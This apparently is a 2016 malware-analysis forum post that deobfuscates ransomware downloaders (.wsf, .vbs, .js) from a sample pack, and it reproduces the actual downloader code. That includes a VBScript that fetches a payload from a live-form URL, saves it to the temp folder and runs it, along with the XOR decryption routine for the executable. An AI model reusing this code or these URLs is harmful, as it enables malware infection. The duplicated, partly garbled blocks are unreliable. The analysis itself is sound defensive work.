- May 14, 2016
- 1,597
https://malwaretips.com/threads/1-8-16-13.61883/
(Thanks to @[URL='https://malwaretips.com/members/solarquest.25489/']Solarquest[/URL] for the "cookies" )
I've seen there are, inside the zipped archive, several scripted downloaders with some obfuscation methods (.vbs , .js, .wsf)
I will use this thread to analyse , and show what it looks like once deobfuscated (or not )
(1) The .wsf files
11 annual report -ACAE1246-.wsf
13 annual report -EDAB2336-.wsf
10 07e81be27f.wsf
9 PV1.wsf
I add from same sub-wave : a file I received as a target, yesterday :
annual report -DFC52512-.wsf
"Dear DardiM,
Please review the attached corrected annual report.
Yours faithfully
Isabel Sutton"
=> reported, this is the result : https://www.hybrid-analysis.com/sam...f309f2add84d337c11ca00c25b0?environmentId=100
This samples are similar downloaders than the one I analysed here, once deobfuscated :
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
So, I won't describe again the deobfuscated parts, just talk about some funny parts
- No need to deobfuscate them (very bad obfuscation method used, see below) : only with a "notepad edit" we can see some parts that I already described on my precedent post (from the fresh new sample received on last wave July,28) :
- Some important clues that appear clearly in the "obfuscated file", by a simple "find" option (it made me laugh ) :
=> var random
=> rawprng()
=> var mash = Mash();
=> function uheprng()
- not very obfuscated important part:
=> QVh1 /* c\040 */(25\066); => QVh1(256) => used for the XOR
=> arrays of chars used for the de-cipher parts (char replacement)
Do you remember that names ? I hope, else go and see the link to analysis above
To summarize :
- These family of scripted downloader, downloads on a path an obfuscated payload that is not seen as executable file.
- The same scripted downloader is also used to decipher, deobfuscate the content of the payload downloaded to make it become a real executable, a ransomware with .exe extension.
- Then the scripted downloader run the payload with a parameter.
The values / names seen above in red are from the new version of this family of downloader using a more complicated technique to obtain the value used to make an XOR between each content char of future .exe file and a value returned by QVh1(256) function. The result take place on the precedent old content char used for the XOR
var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {
Trojan-Downloader.JS.Agent.lxw
Clearly similar to :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
But With awful first obfuscation method => very easy to detect by heuristic analysis
(because they let appear some important string from simple editor text )
Obfuscation Method used first:
- unescape unicode
=> some char are replaced by \unicode
An example :
var XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";
=> Unicode Escaping Tools - Online Toolz
copy-paste in the part :
Converts Unicode Entities to Unicode Text
Unicode Entities
click on convert
result :
var XIu6 = "le" + "";
var Ec = "oFi" + "";
var Ui = "SaveT" + "";
You can't use the tool linked above for decoding the whole file, because some other chars will make it fails
But this can give you an idea of the "poor" method used
Obfuscation Method used after :
- string replacement by var concatenations, functions calls
(2) 2.8.vbs
Obfuscation Method used :
Only replacement / concatenation of strings from vars or functions (an example below)
The funniest part : at the end of the file, this part :
...
...
function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla
First conclusion :
=> important parts are not very well obfuscated ....
=> We can see the url used for the payload
Without trying to deobfuscate it, it's easy to understand almost all :
(Better obfuscation, but analogue result seen on a precedent analysis :
https://malwaretips.com/threads/1-vbs-sample-downloader-vbswgbased-gen-deobfuscation.61734/
=> spoiler on part (4)
)
- It creates a temp file name and makes the path :
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
(adsyqgu = 2 : The Temp folder is used to store temporary files. Its path is found in the TMP environment variable)
- opens a connection and send the request :
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
(uniku = "GET")
- creates an object and opens a stream to save the content received :
Set pwodesen5 = CreateObject(rocu2)
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
("ADODB.Stream" object => see below)
- and uses the same object to save it to a file :
pwodesen5.savetofile pelisak, adsyqgu
- at the end, it runs the payload :
ysezhuxwa unjijbagwe2, pelisak, ozylefla
(function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if)
easy to understand what this script makes...
I deobfuscated 0 parts to write above part ...
(In Green, informations I've retrieve after, to be more clear)
An example of string obtained by several methods :
Set pwodesen5 = CreateObject(rocu2)
rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu
with :
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
// I have rarely seen as easy method => Array(......)(indice_to_use_in_clear)
bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."
function zucebi ()
function cdanufv ()
function ibebacu ()
=> red strings => rocu2 = "adodb.stream"
=> Set pwodesen5 = CreateObject("adodb.stream")
I stop here for the very easy obfuscation methods used.
Next part will be with a sample that uses a more elaborate obfuscation method, from the same Malware Vault pack.
(3) "4 6183943701_01-08-2016.js" ( same method as "7 9329606101_01-08-2016.wsf") :
When first editing this file, the obfuscation method looks interesting
In the spoiler only few parts, to give you an idea
Deobfuscation :
1)
First thing to do : delete all "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts :
2)
Look at the end :
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
- Using the tool I linked in part (1) :
http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"
My first interrogation when I saw this part : "Why doesn't they put URLs in a as easy to retrieve way ?!".
My second interrogation was "are this real used URLs to download payloads ?!"
This first and third URLs are blocked by KTS cloud
The second exist no more : 403
Because the very interesting part is the deobfuscation from their "chaotic" source, make me curious and make me want to completely deobfuscate it ( to see the real parts used, etc...)
3)
Let's investigate more
var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();
A lot of strange strings are using the same function : manysecretthings();
=> lol, very explicit name they gave it
The most important string used this way, are 8492 chars long
manysecretthings() uses char code BITWISE operations : AND, OR , SHR, SHL
and uses also an array to retrieve the good char code from calculated values : lulalula
Let's test :
var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"
var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"
(Thanks to @[URL='https://malwaretips.com/members/solarquest.25489/']Solarquest[/URL] for the "cookies" )
I've seen there are, inside the zipped archive, several scripted downloaders with some obfuscation methods (.vbs , .js, .wsf)
I will use this thread to analyse , and show what it looks like once deobfuscated (or not )
(1) The .wsf files
11 annual report -ACAE1246-.wsf
13 annual report -EDAB2336-.wsf
10 07e81be27f.wsf
9 PV1.wsf
I add from same sub-wave : a file I received as a target, yesterday :
annual report -DFC52512-.wsf
"Dear DardiM,
Please review the attached corrected annual report.
Yours faithfully
Isabel Sutton"
=> reported, this is the result : https://www.hybrid-analysis.com/sam...f309f2add84d337c11ca00c25b0?environmentId=100
This samples are similar downloaders than the one I analysed here, once deobfuscated :
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
So, I won't describe again the deobfuscated parts, just talk about some funny parts
- No need to deobfuscate them (very bad obfuscation method used, see below) : only with a "notepad edit" we can see some parts that I already described on my precedent post (from the fresh new sample received on last wave July,28) :
- Some important clues that appear clearly in the "obfuscated file", by a simple "find" option (it made me laugh ) :
=> var random
=> rawprng()
=> var mash = Mash();
=> function uheprng()
- not very obfuscated important part:
=> QVh1 /* c\040 */(25\066); => QVh1(256) => used for the XOR
=> arrays of chars used for the de-cipher parts (char replacement)
Do you remember that names ? I hope, else go and see the link to analysis above
To summarize :
- These family of scripted downloader, downloads on a path an obfuscated payload that is not seen as executable file.
- The same scripted downloader is also used to decipher, deobfuscate the content of the payload downloaded to make it become a real executable, a ransomware with .exe extension.
- Then the scripted downloader run the payload with a parameter.
The values / names seen above in red are from the new version of this family of downloader using a more complicated technique to obtain the value used to make an XOR between each content char of future .exe file and a value returned by QVh1(256) function. The result take place on the precedent old content char used for the XOR
var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {
file_content_temp[index] ^= QVh1(256); // XOR
// file_content_temp[index] = file_content_temp[index]^ QVh1(256);
}// file_content_temp[index] = file_content_temp[index]^ QVh1(256);
QVh1 = uheprng() => content of var random
)
=> this names should had been obfuscated from the first obfuscation method, because this is really clues to detect the malware easily => call sub-function : var mash = Mash(); mash(value), etc
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function uheprng() {
function Mash() {
if (data) {
return (n >>> 0) * 2.3283064365386963e-10;
} else
n = 0xefc8249d;
};
return mash;}
return (function() {
p = o,
s = new Array(o);
var i, j;
var base64chars ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 1 * 0; i < o; i++) s = mash(384267);
mash = null;
var random = function(range) {
function rawprng() {
if (++p >= o) p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;
}());
};var o = 48,
c = 1,p = o,
s = new Array(o);
var i, j;
var base64chars =
var mash = Mash();
for (i = 1 * 0; i < o; i++) s = mash(384267);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}function rawprng() {
if (++p >= o) p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;
}());
function Mash() {
var n = 0xefc8249d;
var mash = function(data) {if (data) {
data = data.toString();
for (var i = -8257 + 8257; i < data.length; i++) {n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
return (n >>> 0) * 2.3283064365386963e-10;
} else
n = 0xefc8249d;
};
return mash;
Trojan-Downloader.JS.Agent.lxw
Clearly similar to :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
But With awful first obfuscation method => very easy to detect by heuristic analysis
(because they let appear some important string from simple editor text )
Obfuscation Method used first:
<job id="a">
<script language="JScript" id="a">
if (WScript.Path.charAt(WScript.Path.length-1) != "2") WScript.Quit(0);
var aDb7 = 'var\040SNg\065 \075 "ose" +\040"";\r\nvar \122d0 = "cl" +\040"";\r\nvar XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";\r\nvar\040LUg \075 "ext" + "";\r\nvar FSi \075 "iteT" + \042";\r\nv\141r Iq2 \075\040"\167r" +\040"";\r\012var MCl\060\040= "\157p\145n" \053 "";\r\nvar COz = "t" + "";\r\nvar So2 = "rs\145" + "";\r\012var Bk = "C\150a" + ""\073\r\012var\040Pn0\040= "pe" + "";\r\nva\162\040L\154\040= "\164y" + "";\r\n\166ar Yo6\040=\040"m\042 \053 ""\073\r\012var AK\164 = "ea\042 +\040"\042;\r\nvar Fr0 = "tr" + "";\r\n\166ar NYf\065 = \042DB.S" + "";\r\nvar ISh9 = \042O" \053\040"";\r\nv\141r UFg =\040"D" + \042"\073\r\nva\162 YBj = "A" + "";\015\012\166ar \110j\061 = "ect"\040+ "";\r\nvar Ak1 = "eObj\042\040+\040"";\r\nvar\040Qh6 = "eat" + "";\r\nvar Rp9 = \042C\162" + ""\073\r\012functi\157n \124V\145(EIq0)\173re\164urn EIq0;};var N\122\157 = "in" +\040""\073\r\nv\141r Qr9\040= "jo" \053 "";\r\012var YKt = "C\157de\042 + "";\r\nvar Mj9\040= "har" + "\042\073\r\012var QRt = "\146romC" + ""\073\r\nvar Fo9 =\040"h\042 + \042"\073\r\nvar NSj = "l\145n\147t" + "";\r\nvar \132K\161 = \042h" + "";\015\nvar Vy = "pus" + "";\015\nvar \112Rx9 = "t" + "";\r\nvar \115p = "od\145A" + "\042;\r\nvar Ip = "c\150a\162C" + "";\r\nvar\040QRw =\040"h" + \042";\015\012\166a\162 Ul =\040\042\154engt" + "";\015\nvar Vj0\040= "close"
....
....
KJp\133TWg0]();\r\012};';
eval(aDb7.replace('@', 'v'));
WScript.Quit(1);
</script>
</job>
<script language="JScript" id="a">
if (WScript.Path.charAt(WScript.Path.length-1) != "2") WScript.Quit(0);
var aDb7 = 'var\040SNg\065 \075 "ose" +\040"";\r\nvar \122d0 = "cl" +\040"";\r\nvar XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";\r\nvar\040LUg \075 "ext" + "";\r\nvar FSi \075 "iteT" + \042";\r\nv\141r Iq2 \075\040"\167r" +\040"";\r\012var MCl\060\040= "\157p\145n" \053 "";\r\nvar COz = "t" + "";\r\nvar So2 = "rs\145" + "";\r\012var Bk = "C\150a" + ""\073\r\012var\040Pn0\040= "pe" + "";\r\nva\162\040L\154\040= "\164y" + "";\r\n\166ar Yo6\040=\040"m\042 \053 ""\073\r\012var AK\164 = "ea\042 +\040"\042;\r\nvar Fr0 = "tr" + "";\r\n\166ar NYf\065 = \042DB.S" + "";\r\nvar ISh9 = \042O" \053\040"";\r\nv\141r UFg =\040"D" + \042"\073\r\nva\162 YBj = "A" + "";\015\012\166ar \110j\061 = "ect"\040+ "";\r\nvar Ak1 = "eObj\042\040+\040"";\r\nvar\040Qh6 = "eat" + "";\r\nvar Rp9 = \042C\162" + ""\073\r\012functi\157n \124V\145(EIq0)\173re\164urn EIq0;};var N\122\157 = "in" +\040""\073\r\nv\141r Qr9\040= "jo" \053 "";\r\012var YKt = "C\157de\042 + "";\r\nvar Mj9\040= "har" + "\042\073\r\012var QRt = "\146romC" + ""\073\r\nvar Fo9 =\040"h\042 + \042"\073\r\nvar NSj = "l\145n\147t" + "";\r\nvar \132K\161 = \042h" + "";\015\nvar Vy = "pus" + "";\015\nvar \112Rx9 = "t" + "";\r\nvar \115p = "od\145A" + "\042;\r\nvar Ip = "c\150a\162C" + "";\r\nvar\040QRw =\040"h" + \042";\015\012\166a\162 Ul =\040\042\154engt" + "";\015\nvar Vj0\040= "close"
....
....
KJp\133TWg0]();\r\012};';
eval(aDb7.replace('@', 'v'));
WScript.Quit(1);
</script>
</job>
- unescape unicode
=> some char are replaced by \unicode
An example :
var XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";
=> Unicode Escaping Tools - Online Toolz
copy-paste in the part :
Converts Unicode Entities to Unicode Text
Unicode Entities
click on convert
result :
var XIu6 = "le" + "";
var Ec = "oFi" + "";
var Ui = "SaveT" + "";
You can't use the tool linked above for decoding the whole file, because some other chars will make it fails
But this can give you an idea of the "poor" method used
Obfuscation Method used after :
- string replacement by var concatenations, functions calls
(2) 2.8.vbs
Dim gqawtaci
Dim lelruwu7, vlopazo9, dasgilcur9, kiwilve, rocu2, gquhynk4, rmahbezc, ibefo, ijlagle, karyccoq, tefcy2
Dim wyfpi2, ofebw9, qhopkuqfa, imonqy2, aqiv4, iphewb, bubhumug8, zapjym, fifgimtud7
Dim nisyc
Dim avduwra
Dim cuwosamv, znawmuji0, hsinugzy6, gizwul1, uniku, nkemyfog3, efhawu, lexxanwy1
kiwilve = Array ("asn", "ze", "Sc", "ufluv", "uhd", "lwyzl")(2)
ibefo = "WS"
function yqegnokve ()
...
...
End function
vlopazo9 = "el"
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
function nwaqzupe ()
Dim ecowsupo
ecowsupo = "Sy"
nwaqzupe = ecowsupo
End function
function exjat ()
Dim cihojy
cihojy = Array ("LH", "npib", "ipo", "facl", "ese", "xu")(0)
exjat = cihojy
End function
function ymqunygf ()
Dim ixuje
ixuje = "ri"
ymqunygf = ixuje
End function
function vaxivwu ()
Dim yjytt
yjytt = Array ("oje", "hu", "kdeja", "uri", "ip", "efva")(4)
...
lelruwu7 = "Ob"
znawmuji0 = "ex"
efhawu = Array ("Fi", "upe", "dare", "invu", "meff", "uzujq", "uqky", "pa")(0)
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
dasgilcur9 = "b."
tefcy2 = "/c"
function kqufiwbe ()
Dim htywcix
htywcix = Array ("yvah", "oci", "bci", "hxy", "psoqpo", "cbicy", " ", "lyqx")(6)
kqufiwbe = htywcix
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ocgusix ()
Dim zfevydu
zfevydu = "of"
ocgusix = zfevydu
End function
nkemyfog3 = Array ("fxofu", "so", "cr", "ly", "gdi", "uwe", "hri")(2)
cuwosamv = "ng"
lexxanwy1 = Array ("usit", "ujpaz", "kmaz", "aqus", "em", "xax", "no")(4)
karyccoq = "in"
function ugqufqor ()
Dim ecbabruri
ecbabruri = "l"
ugqufqor = ecbabruri
End function
...
...
End function
ijlagle = Array ("vgev", "yriv", "hsexvy", "izto", "wbokm", "ywuvz", "le")(6)
function alwub ()
Dim ciherw
ciherw = Array ("ur", "hxymmo", "dwadm", "udg", "iqber", "oxa", "e ")(6)
alwub = ciherw
End function
function edunahi ()
Dim oxtivvy
oxtivvy = Array ("cwe", "gworne", "Mi", "zuf", "ucik", "ygduv", "itx", "ydp")(2)
edunahi = oxtivvy
End function
function fboxpopku ()
Dim pxapzo
pxapzo = "st"
fboxpopku = pxapzo
End function
function inut ()
Dim xysote
xysote = Array ("je", "tvyth", "uxu", "atu", "osbefh", "bo")(0)
inut = xysote
End function
wyfpi2 = Array ("oba", "t.", "debu", "xwo", "txafy", "icv")(1)
function ypirysy ()
Dim mankiga
mankiga = Array ("wi", "orqu", "op", "P", "yxf", "okovs", "otse")(3)
ypirysy = mankiga
End function
...
....
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "http://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla
Dim lelruwu7, vlopazo9, dasgilcur9, kiwilve, rocu2, gquhynk4, rmahbezc, ibefo, ijlagle, karyccoq, tefcy2
Dim wyfpi2, ofebw9, qhopkuqfa, imonqy2, aqiv4, iphewb, bubhumug8, zapjym, fifgimtud7
Dim nisyc
Dim avduwra
Dim cuwosamv, znawmuji0, hsinugzy6, gizwul1, uniku, nkemyfog3, efhawu, lexxanwy1
kiwilve = Array ("asn", "ze", "Sc", "ufluv", "uhd", "lwyzl")(2)
ibefo = "WS"
function yqegnokve ()
...
...
End function
vlopazo9 = "el"
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
function nwaqzupe ()
Dim ecowsupo
ecowsupo = "Sy"
nwaqzupe = ecowsupo
End function
function exjat ()
Dim cihojy
cihojy = Array ("LH", "npib", "ipo", "facl", "ese", "xu")(0)
exjat = cihojy
End function
function ymqunygf ()
Dim ixuje
ixuje = "ri"
ymqunygf = ixuje
End function
function vaxivwu ()
Dim yjytt
yjytt = Array ("oje", "hu", "kdeja", "uri", "ip", "efva")(4)
...
lelruwu7 = "Ob"
znawmuji0 = "ex"
efhawu = Array ("Fi", "upe", "dare", "invu", "meff", "uzujq", "uqky", "pa")(0)
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
dasgilcur9 = "b."
tefcy2 = "/c"
function kqufiwbe ()
Dim htywcix
htywcix = Array ("yvah", "oci", "bci", "hxy", "psoqpo", "cbicy", " ", "lyqx")(6)
kqufiwbe = htywcix
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ocgusix ()
Dim zfevydu
zfevydu = "of"
ocgusix = zfevydu
End function
nkemyfog3 = Array ("fxofu", "so", "cr", "ly", "gdi", "uwe", "hri")(2)
cuwosamv = "ng"
lexxanwy1 = Array ("usit", "ujpaz", "kmaz", "aqus", "em", "xax", "no")(4)
karyccoq = "in"
function ugqufqor ()
Dim ecbabruri
ecbabruri = "l"
ugqufqor = ecbabruri
End function
...
...
End function
ijlagle = Array ("vgev", "yriv", "hsexvy", "izto", "wbokm", "ywuvz", "le")(6)
function alwub ()
Dim ciherw
ciherw = Array ("ur", "hxymmo", "dwadm", "udg", "iqber", "oxa", "e ")(6)
alwub = ciherw
End function
function edunahi ()
Dim oxtivvy
oxtivvy = Array ("cwe", "gworne", "Mi", "zuf", "ucik", "ygduv", "itx", "ydp")(2)
edunahi = oxtivvy
End function
function fboxpopku ()
Dim pxapzo
pxapzo = "st"
fboxpopku = pxapzo
End function
function inut ()
Dim xysote
xysote = Array ("je", "tvyth", "uxu", "atu", "osbefh", "bo")(0)
inut = xysote
End function
wyfpi2 = Array ("oba", "t.", "debu", "xwo", "txafy", "icv")(1)
function ypirysy ()
Dim mankiga
mankiga = Array ("wi", "orqu", "op", "P", "yxf", "okovs", "otse")(3)
ypirysy = mankiga
End function
...
....
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "http://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla
Obfuscation Method used :
Only replacement / concatenation of strings from vars or functions (an example below)
The funniest part : at the end of the file, this part :
...
...
function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla
First conclusion :
=> important parts are not very well obfuscated ....
=> We can see the url used for the payload
Without trying to deobfuscate it, it's easy to understand almost all :
(Better obfuscation, but analogue result seen on a precedent analysis :
https://malwaretips.com/threads/1-vbs-sample-downloader-vbswgbased-gen-deobfuscation.61734/
=> spoiler on part (4)
)
- It creates a temp file name and makes the path :
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
(adsyqgu = 2 : The Temp folder is used to store temporary files. Its path is found in the TMP environment variable)
- opens a connection and send the request :
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
(uniku = "GET")
- creates an object and opens a stream to save the content received :
Set pwodesen5 = CreateObject(rocu2)
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
("ADODB.Stream" object => see below)
- and uses the same object to save it to a file :
pwodesen5.savetofile pelisak, adsyqgu
- at the end, it runs the payload :
ysezhuxwa unjijbagwe2, pelisak, ozylefla
(function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if)
easy to understand what this script makes...
I deobfuscated 0 parts to write above part ...
(In Green, informations I've retrieve after, to be more clear)
An example of string obtained by several methods :
Set pwodesen5 = CreateObject(rocu2)
rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu
with :
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
// I have rarely seen as easy method => Array(......)(indice_to_use_in_clear)
bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."
function zucebi ()
Dim efjipxu
efjipxu = "St"
zucebi = efjipxu
End functionefjipxu = "St"
zucebi = efjipxu
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End functionbycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End functionfibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
=> red strings => rocu2 = "adodb.stream"
=> Set pwodesen5 = CreateObject("adodb.stream")
I stop here for the very easy obfuscation methods used.
Next part will be with a sample that uses a more elaborate obfuscation method, from the same Malware Vault pack.
(3) "4 6183943701_01-08-2016.js" ( same method as "7 9329606101_01-08-2016.wsf") :
When first editing this file, the obfuscation method looks interesting
In the spoiler only few parts, to give you an idea
votgorodazaspinoyiputkoroheCCCrodmands.create = function(){
var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");
